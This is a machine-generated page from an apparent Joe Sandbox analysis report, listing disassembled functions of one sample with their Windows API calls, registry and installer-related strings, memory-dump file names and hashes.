Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: 95153dd2474b33b1e653ecfbaa1ea9ee946668435f42db16728d4b864c59fb6d
Instruction ID: a4e0851a434ff52845f42597b7360b6c9014b455c091233ef3f94c27c583e5f4
Opcode Fuzzy Hash: 95153dd2474b33b1e653ecfbaa1ea9ee946668435f42db16728d4b864c59fb6d
Instruction Fuzzy Hash: 2441B871500B05ABDB70EBB0C889FDB73EDAF04341F44492DB69AD3092EB74F5858A64

Function 00103245 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00103258
VariantInit.OLEAUT32(?), ref: 00103264
VariantClear.OLEAUT32(?), ref: 001032D8
SysFreeString.OLEAUT32(00000000), ref: 001032E3

Part of subcall function 00103498: SysAllocString.OLEAUT32(?), ref: 001034AD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID:
API String ID: 347726874-0
Opcode ID: caf605a3dd03134b3d91d1611e6b992f56456ab56b2a222348330b3b0dd95e0c
Instruction ID: c67499ed2e904b7759456e0d6bc79d6e2475589dd1f0ea5601290c9080c37b86
Opcode Fuzzy Hash: caf605a3dd03134b3d91d1611e6b992f56456ab56b2a222348330b3b0dd95e0c
Instruction Fuzzy Hash: 89214C31A01219AFCB14DFA4C898EAEBBBDFF48715F104158E851EB260D7719E45CB90

Function 000C4C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 000CF96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,000C4CA5,?,?,00000001), ref: 000CF9BC

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 000C4D0C

Strings

Failed to re-launch bundle process after RunOnce: %ls, xrefs: 000C4CF6
Unable to get resume command line from the registry, xrefs: 000C4CAB
Failed to get current process path., xrefs: 000C4CCA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: a467e58bc4d26adddb7755beda2ea89b5576121d3cc01076f7f45bb06129d6b5
Instruction ID: 2da60b2ce8e9b3f5980bdfc0dfffacc77a4d4549ede79d46259c6ec2551b8e61
Opcode Fuzzy Hash: a467e58bc4d26adddb7755beda2ea89b5576121d3cc01076f7f45bb06129d6b5
Instruction Fuzzy Hash: A0118171D05518BBCF22AB94DC51EAEBBB8FF54711F1081AAF841B2251DBB18E109B80

Function 000F88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000F8A56,00000000,00000000,?,000F8859,000F8A56,00000000,00000000,00000000,?,000F8A56,00000006,FlsSetValue), ref: 000F88E4
GetLastError.KERNEL32(?,000F8859,000F8A56,00000000,00000000,00000000,?,000F8A56,00000006,FlsSetValue,00122404,0012240C,00000000,00000364,?,000F6230), ref: 000F88F0
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000F8859,000F8A56,00000000,00000000,00000000,?,000F8A56,00000006,FlsSetValue,00122404,0012240C,00000000), ref: 000F88FE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4835937c095e1b861e74115f241bb664d4ab6ce0b0b5aa59196119779cff4df6
Instruction ID: 764c2e33bdbc7d9b257c3480135236e6eb35bb6ebb8f0e68ca465b96b7cebf84
Opcode Fuzzy Hash: 4835937c095e1b861e74115f241bb664d4ab6ce0b0b5aa59196119779cff4df6
Instruction Fuzzy Hash: 9E01D83674922BBBC7314B699C849BB77D8EF15BA17144520FA16E3940DBA0D84197E0

Function 000F615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,000F1AEC,00000000,80004004,?,000F1DF0,00000000,80004004,00000000,00000000), ref: 000F6162
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000F61CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000F61D6
_abort.LIBCMT ref: 000F61DC

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: deebc86c90de0866fbd3b120146c9f2ebf5bd97171327e4fcfb3f85213e1df42
Instruction ID: 64d5e4135f008a289c9fa3d6c9eb687bbb889915134e13031337b3281b58bdb9
Opcode Fuzzy Hash: deebc86c90de0866fbd3b120146c9f2ebf5bd97171327e4fcfb3f85213e1df42
Instruction Fuzzy Hash: 0FF0C836108A1967C26233357C0ABBF27A9AFC1772B290124FF5496D93FF6198427125

Function 000C7435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000C7441
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 000C74A8

Strings

Failed to get value of variable: %ls, xrefs: 000C747B
Failed to get value as numeric for variable: %ls, xrefs: 000C7497

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: 3955d108ac3aeb333b0193fb5bc7095449dfc7e4422274abeef4fe922731f592
Instruction ID: 5c6aeca0c61f5098ab5ba210e24b53d7f5c30b90b5ae7a09b7352d0302f9ae7d
Opcode Fuzzy Hash: 3955d108ac3aeb333b0193fb5bc7095449dfc7e4422274abeef4fe922731f592
Instruction Fuzzy Hash: 3E017136948128FBCF255F54CC05F9E7F68AF14761F008169FD08A6261C3769E50ABD0

Function 000C75AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000C75B6
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 000C761D

Strings

Failed to get value of variable: %ls, xrefs: 000C75F0
Failed to get value as version for variable: %ls, xrefs: 000C760C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: e3a094120603aab3f79dce679bb1c3c7b16fec11cbc241e3c69df1f791f7c5b4
Instruction ID: b1821ecd084b64aa82e22f8ca2b8f41997730e80355d6fae0b35c0b75ee9670f
Opcode Fuzzy Hash: e3a094120603aab3f79dce679bb1c3c7b16fec11cbc241e3c69df1f791f7c5b4
Instruction Fuzzy Hash: 17018F72948928FBCF225F84CC09F9E3B65EF14761F004169FD08AA261D3B69E509FD4

Function 000C7539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,000C9897,00000000,?,00000000,00000000,00000000,?,000C96D6,00000000,?,00000000,00000000), ref: 000C7545
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,000C9897,00000000,?,00000000,00000000,00000000,?,000C96D6,00000000,?,00000000), ref: 000C759B

Strings

Failed to get value of variable: %ls, xrefs: 000C756B
Failed to copy value of variable: %ls, xrefs: 000C758A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: d14eb0c1010098447d94640868ab3ee21484769c243e96f9a55b28d719f3f310
Instruction ID: 20f1dec2c900155830aea8d91cfb01d85e60a6a88f1ed88e430425af6cde8cae
Opcode Fuzzy Hash: d14eb0c1010098447d94640868ab3ee21484769c243e96f9a55b28d719f3f310
Instruction Fuzzy Hash: 0FF08C36944628FBCF126F94CC09E9E3F68EF18361F008124FD08A6261C7B29E619BD0

Function 000EE776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000EE788
GetCurrentThreadId.KERNEL32 ref: 000EE797
GetCurrentProcessId.KERNEL32 ref: 000EE7A0
QueryPerformanceCounter.KERNEL32(?), ref: 000EE7AD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 79b0126206cac7e3b5474e9a1f4db581069a5f38d6d5cbff13477b23fc3b7c2c
Instruction ID: f244cf4f4595c92c24a0e00379c75b01a40f6037ee64ec9f64dfe0f52220b6d7
Opcode Fuzzy Hash: 79b0126206cac7e3b5474e9a1f4db581069a5f38d6d5cbff13477b23fc3b7c2c
Instruction Fuzzy Hash: A8F09D70C1420CEBCB00DBB4D989A9EBBF8FF08301F614895A401E7110E774AB448B61

Function 00100C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 00100DD7

Strings

regutil.cpp, xrefs: 00100DC4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: regutil.cpp
API String ID: 3535843008-955085611
Opcode ID: cfcde7579208debad108488f52f34470ffa628736b6e3fc866a52d9a9f518278
Instruction ID: 75f1f400e62922b58bc8e0c3f42a280c9b3f159f70aefdcfcb73edc4ee898838
Opcode Fuzzy Hash: cfcde7579208debad108488f52f34470ffa628736b6e3fc866a52d9a9f518278
Instruction Fuzzy Hash: 0941D832D0152AFBDB338AD4CD04BEE7761AB08720F158165FC84AA1D0D7F59E909BE0

Function 0010479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 001048FC

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 001047AC
PendingFileRenameOperations, xrefs: 001047EC, 001048D4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: c2e31774bffed2429532b8bfc8f52101b232d997f47c308a6075cde5699c4645
Instruction ID: adfacd9a5216f9dac5f88bf4cc3e194543ff491a74f93c433dc6470cef837784
Opcode Fuzzy Hash: c2e31774bffed2429532b8bfc8f52101b232d997f47c308a6075cde5699c4645
Instruction Fuzzy Hash: 314184B5E00159EFCF20DFD4C8C1AAEBBB5EF44B10F15846AE680A7291DBB19E50DB50

Function 001010B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0010112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00101163

Strings

regutil.cpp, xrefs: 001011A9

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 37df82a1ef11b6ade931318cea42b0c4c14a7f8f04e2967a34fd85c1d7565a0c
Instruction ID: 02e03c237330e3428b30ee8d10237fef2c627bdf17237fa4befae56e72579787
Opcode Fuzzy Hash: 37df82a1ef11b6ade931318cea42b0c4c14a7f8f04e2967a34fd85c1d7565a0c
Instruction Fuzzy Hash: 1F419332D0012AFBDB249FA4CC41AEEBBB9FF14350F118169FA50A7191D7B59E118B90

Function 000F66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0010B518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 000F67A3
GetLastError.KERNEL32 ref: 000F67BF

Strings

comres.dll, xrefs: 000F674A, 000F6798, 000F67D4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: bb4aa6298a4229835f8a51064d53e0c1a4d93a5049dfab93731d53ec2fba5ed3
Instruction ID: 7064fb0f849c46fd7820a7cef022daf52025954e6593df7c06c6b3d8abb45b34
Opcode Fuzzy Hash: bb4aa6298a4229835f8a51064d53e0c1a4d93a5049dfab93731d53ec2fba5ed3
Instruction Fuzzy Hash: EF31163020831DABCB21BF55D885ABF7BE89F41724F180165FA158B992EB72CD00F7A1

Function 00108F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00108E44: lstrlenW.KERNEL32(00000100,?,?,?,00109217,000002C0,00000100,00000100,00000100,?,?,?,000E7D87,?,?,000001BC), ref: 00108E69

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0010B500,wininet.dll,?), ref: 0010907A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0010B500,wininet.dll,?), ref: 00109087

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

Part of subcall function 00100E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,000E8E1B), ref: 00100EAA
Part of subcall function 00100E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000E8E1B,00000000), ref: 00100EC8

Strings

wininet.dll, xrefs: 00108FEF, 0010903C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: 01d07e778f893692eac8e13b77670d12c6661dd9dbfc4700694094ce1a3139ef
Instruction ID: 2ce359f62dd1fe19d2ae1294bd8bb66ac155f7c183c057e1f4f1bd4656dd763d
Opcode Fuzzy Hash: 01d07e778f893692eac8e13b77670d12c6661dd9dbfc4700694094ce1a3139ef
Instruction Fuzzy Hash: 4F311932C0112ABBCF22AFA4CD509AFBB79EF04710F518179FA90761A6C7B14E509B90

Function 0010939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00108E44: lstrlenW.KERNEL32(00000100,?,?,?,00109217,000002C0,00000100,00000100,00000100,?,?,?,000E7D87,?,?,000001BC), ref: 00108E69

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00109483
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0010949D

Part of subcall function 00100BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,000D061A,?,00000000,00020006), ref: 00100C0E

Part of subcall function 001014F4: RegSetValueExW.ADVAPI32(00020006,00110D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,000CF335,00000000,?,00020006), ref: 00101527

Part of subcall function 001014F4: RegDeleteValueW.ADVAPI32(00020006,00110D10,00000000,?,?,000CF335,00000000,?,00020006,?,00110D10,00020006,00000000,?,?,?), ref: 00101557

Part of subcall function 001014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,000CF28D,00110D10,Resume,00000005,?,00000000,00000000,00000000), ref: 001014BB

Strings

%ls\%ls, xrefs: 001093FF

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 81d4ac010652192eb151ed8edfa54e9050954fd0be69859c84f0cae36a166d87
Instruction ID: 593f0df20670366b060d5f0d105305f66245718c188c70afd7c5a52c9330650f
Opcode Fuzzy Hash: 81d4ac010652192eb151ed8edfa54e9050954fd0be69859c84f0cae36a166d87
Instruction Fuzzy Hash: 08313972C0012DBFCF229F94CD418DEBBB9FF04310B41416AF944A6162D7728E61EB90

Function 000C3A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 000C3AB0

Strings

wininet.dll, xrefs: 000C3A6E
crypt32.dll, xrefs: 000C3A6D, 000C3AAC, 000C3AAE

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction ID: 28d4cc980f6745e6aea748ec9beaf54fd2094f1026317ff8f077e1ff020b197e
Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction Fuzzy Hash: 37115E71610219AFCB08DF19CD85EEFBF69EF95390B14802AFD058B311D671EA20CAE0

Function 001014F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,00110D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,000CF335,00000000,?,00020006), ref: 00101527
RegDeleteValueW.ADVAPI32(00020006,00110D10,00000000,?,?,000CF335,00000000,?,00020006,?,00110D10,00020006,00000000,?,?,?), ref: 00101557

Strings

regutil.cpp, xrefs: 0010158B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 8df94a32120cc36f3b410fb02730b6edeb508e7b65ba67ba3995338681a40d3b
Instruction ID: 2d1f1ab50f99c000e58ec09f1c65875da4936389886418b23f59d128f85c220b
Opcode Fuzzy Hash: 8df94a32120cc36f3b410fb02730b6edeb508e7b65ba67ba3995338681a40d3b
Instruction Fuzzy Hash: 0B113A36D50136B7CB314A945C05BAB7A15AB46760F110121BD42BE1D0EBB8CD2097E0

Function 000CDDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,000E7691,00000000,IGNOREDEPENDENCIES,00000000,?,0010B518), ref: 000CDE04

Strings

Failed to copy the property value., xrefs: 000CDE38
IGNOREDEPENDENCIES, xrefs: 000CDDBB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

